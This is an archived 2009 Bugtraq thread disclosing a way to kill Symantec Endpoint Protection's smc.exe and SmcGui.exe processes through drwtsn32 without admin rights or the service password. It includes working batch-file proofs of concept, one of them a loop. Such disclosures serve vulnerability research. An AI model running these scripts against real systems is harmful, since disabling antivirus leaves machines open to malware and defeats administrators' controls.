Re: SEPKILL /im SMC.EXE /f

For the "users" its working for SmcGUI.exe

Please find the code as below.

:here
tasklist | find /i "SmcGui.exe" > c:\pid.txt
FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
drwtsn32 -p %pidopt%
goto :here

I have tried it and when let this file run for around 2 mins, The SmcGui.exe process loads up when you logoff and log back in (or restart)but the icon does not show up in the taskbar.

Thank you.

Regards, Sandeep

--------------------------------------------------
From: "Sandeep Cheema" <51l3n7@xxxxxxx>
Sent: Friday, February 13, 2009 7:03 PM
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Re: SEPKILL /im SMC.EXE /f

As an update its not happening for "Users" account, Though no access denied.

Anyone knows why?

Thank you.

Regards, Sandeep

--------------------------------------------------
From: "Sandeep Cheema" <51l3n7@xxxxxxx>
Sent: Friday, February 13, 2009 6:18 PM
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: SEPKILL /im SMC.EXE /f

Hi,

Probably this bug exists on majorly all the software's but security software's like antivirus and firewall have to bucket it which is not what its for SEP.
I have tested it on all versions of SEP from 11.0.776 to 11.0.4000(XP and 2k3)


You can kill smc.exe with the help of drwtsn32.exe in the following way.

drwtsn32 -p %pid%
where pid is the process id for smc.exe

POC:

Save the following as a batch file and execute it

tasklist | find /i "Smc.exe" > c:\pid.txt
FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
drwtsn32 -p %pidopt%



You don't need admin privilege for this exploit.

This will even bypass the password if it has been set to stop the service.
If executed from the command line in the form drwtsn32 -p %pid% , the command will be executed and it takes some time for the process to be stopped.
If done from a batch file the command is completed only when the process is stopped.

Regards, Sandeep
51l3n7[at]live.in




Relevant Pages

  • Re: SEPKILL /im SMC.EXE /f
    ... Subject: SEPKILL /im SMC.EXE /f ... ::Save the following as a batch file and execute it. ...
    (Bugtraq)
  • Re: xp_cmdshell default path (system32) problem
    ... building a batch file in code and then ... it will NOT actually execute the delete if the patch I supply is not valid. ... I'm use xp_cmdShell to execute "erase" command like ...
    (microsoft.public.sqlserver.programming)
  • Re: Perfmon and batch file
    ... > event viewer and run command file. ... > but no execute the cmd file or execute it but not execute the ... You are probably making some assumptions in your batch file ... @echo off ...
    (microsoft.public.windows.server.general)
  • BatchFile/CmdScript to run Ad-aware, Spybot, AV s/w
    ... I would like a batch file or command script that would ... Execute Ad-aware, ...
    (microsoft.public.windowsxp.security_admin)
  • Re: SEPKILL /im SMC.EXE /f
    ... Probably this bug exists on majorly all the software's but security software's like antivirus and firewall have to bucket it which is not what its for SEP. ... Save the following as a batch file and execute it ... If done from a batch file the command is completed only when the process is stopped. ...
    (Bugtraq)